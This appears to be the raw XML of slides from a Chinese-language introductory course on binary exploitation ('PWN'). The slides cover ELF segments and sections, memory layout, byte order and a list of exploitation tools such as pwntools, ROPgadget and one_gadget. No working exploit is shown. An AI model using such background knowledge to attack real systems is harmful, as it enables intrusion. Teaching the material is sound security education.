            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7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317667" y="2354677"/>
            <a:ext cx="7730836"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IDA Pro</a:t>
            </a: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pwntools</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pwndbg</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checksec</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ROPgadget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one_gadget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LibcSearcher</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main_arena_offset</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8283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76683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IDA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Pro</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0556140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tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222729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588303" y="1034283"/>
            <a:ext cx="46746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段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）与节（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>section</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9ED34666-3964-462A-8D09-714EA26650EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902731" y="1773179"/>
            <a:ext cx="479128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一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包含多个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节</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段视图用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>区域的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权限划分</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节视图用于</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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编译链接时 与 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>磁盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上存储时 的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的组织</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1487CD6E-A5C7-4DFD-8290-7072AC2F1A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123264" y="1773179"/>
            <a:ext cx="5299079" cy="5078313"/>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代码段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Text segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）包含了代码与只读数据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.text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rodata</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.hash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dynsym</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dynstr</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rel.got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数据段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Data segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）包含了可读可写数据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.dynamic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.got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got.plt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bss</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栈段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Stack segment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914C381E-7298-4686-8607-7A7C570B311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1311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540806"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dbg</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928009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check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>sec</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26567306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218877"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ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</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8483074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444900"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One_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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9874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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856352" y="2611497"/>
            <a:ext cx="4346715" cy="3515348"/>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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>glb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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str = “Hello world!”;</a:t>
            </a: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endParaRPr lang="en" altLang="zh-C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int main() </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sum(1, 2);</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void*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 malloc(0x100);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read(0,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0x100);  // input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>deadbeef</a:t>
            </a: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return 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cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5203067" y="4369171"/>
            <a:ext cx="1777381" cy="4256"/>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5306927" y="3990805"/>
            <a:ext cx="156966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编译链接执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2283351" y="1976123"/>
            <a:ext cx="14927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语言源代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E28E50-13F3-4E7B-8ECF-BAA2AB2D90C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6980448" y="1408841"/>
            <a:ext cx="4224176" cy="5172264"/>
            <a:chOff x="6503924" y="1331567"/>
            <a:chExt cx="4790847" cy="5237782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Shape 740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516F7AAC-37C4-4C3D-840A-9E07E25B3D80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6503924" y="1331567"/>
              <a:ext cx="4790847" cy="5237782"/>
              <a:chOff x="4897550" y="1212775"/>
              <a:chExt cx="1363200" cy="3309752"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Shape 741">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8E1F0C-1E5C-4FBD-B9EE-136FA129997A}"/>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Kernel</a:t>
                </a:r>
                <a:endParaRPr dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Shape 742">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB864F51-F08D-48DF-B235-796BF6CF267A}"/>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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>t</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>ptr</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Shape 743">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D882F786-2C4C-4F15-939C-B6D8F7527EF3}"/>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Shape 744">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BA1D80-E668-46C6-992A-B6C7FDCB5A4C}"/>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28" name="Shape 745">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBC97EC-4122-4EE0-99A7-3C6A101DBC68}"/>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Shape 746">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B12AF7-6ABB-4F71-9EE5-2CDB56246F49}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3158070"/>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 “</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>deadbeef</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>”</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Shape 747">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827A47B3-3393-43CF-BB19-F65D412C5CA8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3699927"/>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t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>str</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Shape 748">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B2411C-343C-466F-B821-23AADDFBB0A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3974127"/>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 main</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>sum</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>Hello </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>world!”</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Shape 749">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AFB405-9397-4105-9E7C-9D8FF80A0AEE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4248327"/>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33" name="Shape 750">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB517B1-5875-40F8-88B9-1FDAECF47516}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26"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34" name="Shape 751">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8E43AF-266F-4456-A067-2ADA36DE75B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="29" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="2823868"/>
                <a:ext cx="0" cy="334200"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3078131-2CDB-4D7E-98CE-F3EF1CAF2874}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6503924" y="4832505"/>
              <a:ext cx="4790847" cy="43393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r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>glb</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="矩形 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B18F75-E807-43D6-9183-87010CB993F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537759" y="4383289"/>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载入内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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449353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程序数据是如何在内存中组织的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390AA778-64F1-4CDA-9651-D9CB7A278E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391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2375971"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大端序与小端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D5597-3522-4BF8-9AA0-52EB6441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717" y="1886272"/>
            <a:ext cx="2667000" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B10552D-2956-4418-B093-D93BFC6AB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687" y="1886272"/>
            <a:ext cx="2667000" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96DEF0F-C629-4815-9C44-CA69CBEF1475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296460" y="4267522"/>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小端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE6B6E5-7EBA-4C0B-B278-B44C0A40A939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4267521"/>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大端序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAC8EA4-2BF3-43AD-8396-6B65B94A7119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292361" y="4729186"/>
            <a:ext cx="351882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低地址存放数据低位、高地址存放数据高位</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我们所主要关注的格式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBBA69C-C3BB-481B-BA6B-689E87EC6935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4729186"/>
            <a:ext cx="351882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低地址存放数据高位、高地址存放数据低位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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D104C273-E426-402A-B86D-C75E3EEBD6E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70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020ADE-8E79-46B2-805C-C988FB5F7C11}"/>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875280"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0</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PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">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C4D326CA-BB67-4685-8B5E-C8156872EC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
